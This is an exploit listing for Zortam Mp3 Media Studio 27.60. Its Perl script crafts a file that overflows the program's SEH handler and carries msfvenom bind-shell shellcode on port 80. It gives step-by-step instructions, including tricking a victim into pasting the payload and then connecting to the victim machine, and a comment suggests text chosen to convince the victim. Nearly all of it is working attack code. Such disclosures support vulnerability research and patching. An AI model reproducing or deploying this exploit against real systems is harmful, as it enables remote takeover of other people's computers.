# Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH) # Date: November 19, 2020 # Exploit Author: Vincent Wolterman # Vendor Homepage: https://www.zortam.com/index.html # Software Link: https://www.zortam.com/download.html # Version: 27.60 # Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041 # Steps to reproduce crash: # 1) Run provided Perl code Zortam_MP3_Studio_poc.pl # 2) Open Zortam_Crash.txt output file # 3) Copy contents of text file to clipboard # 4) Open Zortam Mp3 Studio # 5) From the Menu bar -> File -> New Library # 6) Click ‘OK’ when prompted ‘Do you want to create a new Mp3 library?’ # 7) Paste the contents of Zortam_Crash.txt into the ‘Select Folder’ field # 8) Click 'OK' # 9) Connect to victim machine on port 80 #!/usr/bin/perl $baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash) $baddata .= "\x90" x (268-length($baddata)); # exact overwrite at 272 $nseh = "\xeb\x0b\x90\x90"; # nseh overwrite JMP short 11 bytes into NOP sled # 0x10015962 : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50 # (C:\Program Files\Zortam Mp3 Media Studio\WNASPI32.DLL) $seh = "\x62\x59\x01\x10"; # seh overwrite $nop = "\x90" x 12; # NOP sled # msfvenom -p windows/shell_bind_tcp LPORT=80 -b "\x00\x0a\x0d" -f perl -v payload EXITFUNC=seh # Payload size: 355 bytes $payload = "\xd9\xcf\xbf\xad\x91\xa4\xe3\xd9\x74\x24\xf4\x5a\x29\xc9" . "\xb1\x53\x83\xc2\x04\x31\x7a\x13\x03\xd7\x82\x46\x16\xdb" . "\x4d\x04\xd9\x23\x8e\x69\x53\xc6\xbf\xa9\x07\x83\x90\x19" . "\x43\xc1\x1c\xd1\x01\xf1\x97\x97\x8d\xf6\x10\x1d\xe8\x39" . "\xa0\x0e\xc8\x58\x22\x4d\x1d\xba\x1b\x9e\x50\xbb\x5c\xc3" . "\x99\xe9\x35\x8f\x0c\x1d\x31\xc5\x8c\x96\x09\xcb\x94\x4b" . "\xd9\xea\xb5\xda\x51\xb5\x15\xdd\xb6\xcd\x1f\xc5\xdb\xe8" . "\xd6\x7e\x2f\x86\xe8\x56\x61\x67\x46\x97\x4d\x9a\x96\xd0" . "\x6a\x45\xed\x28\x89\xf8\xf6\xef\xf3\x26\x72\xeb\x54\xac" . "\x24\xd7\x65\x61\xb2\x9c\x6a\xce\xb0\xfa\x6e\xd1\x15\x71" . "\x8a\x5a\x98\x55\x1a\x18\xbf\x71\x46\xfa\xde\x20\x22\xad" . "\xdf\x32\x8d\x12\x7a\x39\x20\x46\xf7\x60\x2d\xab\x3a\x9a" . "\xad\xa3\x4d\xe9\x9f\x6c\xe6\x65\xac\xe5\x20\x72\xd3\xdf" . "\x95\xec\x2a\xe0\xe5\x25\xe9\xb4\xb5\x5d\xd8\xb4\x5d\x9d" . "\xe5\x60\xcb\x95\x40\xdb\xee\x58\x32\x8b\xae\xf2\xdb\xc1" . "\x20\x2d\xfb\xe9\xea\x46\x94\x17\x15\x68\x35\x91\xf3\x02" . "\xa5\xf7\xac\xba\x07\x2c\x65\x5d\x77\x06\xdd\xc9\x30\x40" . "\xda\xf6\xc0\x46\x4c\x60\x4b\x85\x48\x91\x4c\x80\xf8\xc6" . "\xdb\x5e\x69\xa5\x7a\x5e\xa0\x5d\x1e\xcd\x2f\x9d\x69\xee" . "\xe7\xca\x3e\xc0\xf1\x9e\xd2\x7b\xa8\xbc\x2e\x1d\x93\x04" . "\xf5\xde\x1a\x85\x78\x5a\x39\x95\x44\x63\x05\xc1\x18\x32" . "\xd3\xbf\xde\xec\x95\x69\x89\x43\x7c\xfd\x4c\xa8\xbf\x7b" . "\x51\xe5\x49\x63\xe0\x50\x0c\x9c\xcd\x34\x98\xe5\x33\xa5" . "\x67\x3c\xf0\xdb\x96\x8c\xed\x4c\x01\x65\x4c\x11\xb2\x50" . "\x93\x2c\x31\x50\x6c\xcb\x29\x11\x69\x97\xed\xca\x03\x88" . "\x9b\xec\xb0\xa9\x89"; $file = "Zortam_Crash.txt"; open (FILE, '>Zortam_Crash.txt'); print FILE $baddata; print FILE $nseh; print FILE $seh; print FILE $nop; print FILE $payload; close (FILE); print "Exploit file created [" . $file . "]\n"; print "Buffer size: " . length($baddata) . "\n";